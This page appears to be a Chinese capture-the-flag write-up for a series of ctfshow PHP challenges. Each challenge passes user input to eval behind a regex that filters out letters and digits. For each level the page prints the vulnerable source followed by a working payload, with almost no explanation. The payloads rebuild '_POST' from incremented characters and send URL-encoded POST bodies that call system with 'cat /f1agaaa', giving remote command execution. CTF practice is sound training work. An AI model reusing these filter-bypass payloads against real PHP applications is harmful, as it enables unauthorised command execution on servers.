本文最后更新于 826 天前,其中的信息可能已经有所发展或是发生改变。
| <?php |
| |
| error_reporting(0); |
| highlight_file(__FILE__); |
| |
| $code = $_POST['code']; |
| |
| $code = str_replace("(","括号",$code); |
| |
| $code = str_replace(".","点",$code); |
| |
| eval($code); |
| |
| ?> |
| <?php |
| |
| error_reporting(0); |
| highlight_file(__FILE__); |
| |
| if (isset($_POST['ctf_show'])) { |
| $ctfshow = $_POST['ctf_show']; |
| if (is_string($ctfshow)) { |
| if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){ |
| eval($ctfshow); |
| }else{ |
| echo("Are you hacking me AGAIN?"); |
| } |
| }else{ |
| phpinfo(); |
| } |
| } |
| ?> |
| <?php |
| $_=[].''; |
| $_=$_[''=='$']; |
| $____='_'; |
| $__=$_; |
| $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; |
| $____.=$__; |
| $__=$_; |
| $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; |
| $____.=$__; |
| $__=$_; |
| $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; |
| $____.=$__; |
| $__=$_; |
| $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; |
| $____.=$__; |
| $_=$____; |
| |
| $$_[__]($$_[_]); |
| ctf_show=%24%5F%3D%5B%5D%2E%27%27%3B%24%5F%3D%24%5F%5B%27%27%3D%3D%27%24%27%5D%3B%24%5F%5F%5F%5F%3D%27%5F%27%3B%24%5F%5F%3D%24%5F%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%5F%5F%2E%3D%24%5F%5F%3B%24%5F%5F%3D%24%5F%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%5F%5F%2E%3D%24%5F%5F%3B%24%5F%5F%3D%24%5F%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%5F%5F%2E%3D%24%5F%5F%3B%24%5F%5F%3D%24%5F%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%2B%2B%3B%24%5F%5F%5F%5F%2E%3D%24%5F%5F%3B%24%5F%3D%24%5F%5F%5F%5F%3B%24%24%5F%5B%5F%5F%5D%28%24%24%5F%5B%5F%5D%29%3B&__=system&_=cat /f1agaaa |
| <?php |
| |
| error_reporting(0); |
| highlight_file(__FILE__); |
| |
| if (isset($_POST['ctf_show'])) { |
| $ctfshow = $_POST['ctf_show']; |
| if (is_string($ctfshow) && strlen($ctfshow) <= 105) { |
| if (!preg_match("/[a-zA-Z2-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){ |
| eval($ctfshow); |
| }else{ |
| echo("Are you hacking me AGAIN?"); |
| } |
| }else{ |
| phpinfo(); |
| } |
| } |
| ?> |
| <?php |
| $a=(0/0); |
| $a.=_; |
| $a=$a[0]; |
| $a++; |
| $o=$a++; |
| $p=$a++; |
| $a++;$a++; |
| $s=$a++; |
| $t=$a; |
| $_=_; |
| $_.=$p.$o.$s.$t; |
| $$_[0]($$_[1]); |
| ctf_show=$%ff=(0/0);$%ff.=_;$%ff=$%ff[0];$%ff%2b%2b;$%fd=$%ff%2b%2b;$%fe=$%ff%2b%2b;$%ff%2b%2b;$%ff%2b%2b;$%fc=$%ff%2b%2b;$%fb=$%ff;$_=_;$_.=$%fe.$%fd.$%fc.$%fb;$$_[0]($$_[1]);&0=system&1=cat /f1agaaa |
| <?php |
| |
| error_reporting(0); |
| highlight_file(__FILE__); |
| |
| if (isset($_POST['ctf_show'])) { |
| $ctfshow = $_POST['ctf_show']; |
| if (is_string($ctfshow) && strlen($ctfshow) <= 84) { |
| if (!preg_match("/[a-zA-Z1-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){ |
| eval($ctfshow); |
| }else{ |
| echo("Are you hacking me AGAIN?"); |
| } |
| }else{ |
| phpinfo(); |
| } |
| } |
| ?> |
| <?php |
| $a=(_/_._)[0]; |
| $o=++$a; |
| $o=++$a.$o; |
| $a++; |
| $a++; |
| $o.=++$a; |
| $o.=++$a; |
| $_=_.$o; |
| $$_[0]($$_[_]); |
| ctf_show=$%ff=(_/_._)[0];$%fe=%2b%2b$%ff;$%fe=%2b%2b$%ff.$%fe;$%ff%2b%2b;$%ff%2b%2b;$%fe.=%2b%2b$%ff;$%fe.=%2b%2b$%ff;$_=_.$%fe;$$_[0]($$_[_]);&0=system&_=cat /f1agaaa |
| <?php |
| |
| error_reporting(0); |
| highlight_file(__FILE__); |
| |
| if (isset($_POST['ctf_show'])) { |
| $ctfshow = $_POST['ctf_show']; |
| if (is_string($ctfshow) && strlen($ctfshow) <= 73) { |
| if (!preg_match("/[a-zA-Z1-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){ |
| eval($ctfshow); |
| }else{ |
| echo("Are you hacking me AGAIN?"); |
| } |
| }else{ |
| phpinfo(); |
| } |
| } |
| ?> |
| <?php |
| $a=_(a/a)[a]; |
| $_=++$a; |
| $_=_.++$a.$_; |
| $a++;$a++; |
| $_.=++$a.++$a; |
| $$_[a]($$_[_]); |
| ctf_show=$%ff=_(%ff/%ff)[%ff];$_=%2b%2b$%ff;$_=_.%2b%2b$%ff.$_;$%ff%2b%2b;$%ff%2b%2b;$_.=%2b%2b$%ff.%2b%2b$%ff;$$_[_]($$_[%ff]);&_=system&%ff=cat /f1agaaa |
| $_=_(a/a)[_]; |
| $a=++$_; |
| $$a[$a=_.++$_.$a[$_++/$_++].++$_.++$_]($$a[_]); |
| ctf_show=$_=_(%ff/%ff)[_];$%ff=%2b%2b$_;$$%ff[$%ff=_.%2b%2b$_.$%ff[$_%2b%2b/$_%2b%2b].%2b%2b$_.%2b%2b$_]($$%ff[_]);&_POST=system&_=cat /f1agaaa |
| <?php |
| $a=_(a/a)[a]; |
| ++$a; |
| $_=$a.$a++; |
| $a++;$a++; |
| $_=_.$_.++$a.++$a; |
| $$_[a]($$_[_]); |
| ctf_show=$%ff=_(%ff/%ff)[%ff];%2b%2b$%ff;$_=$%ff.$%ff%2b%2b;$%ff%2b%2b;$%ff%2b%2b;$_=_.$_.%2b%2b$%ff.%2b%2b$%ff;$$_[%ff]($$_[_]);&%ff=system&_=cat /f1agaaa |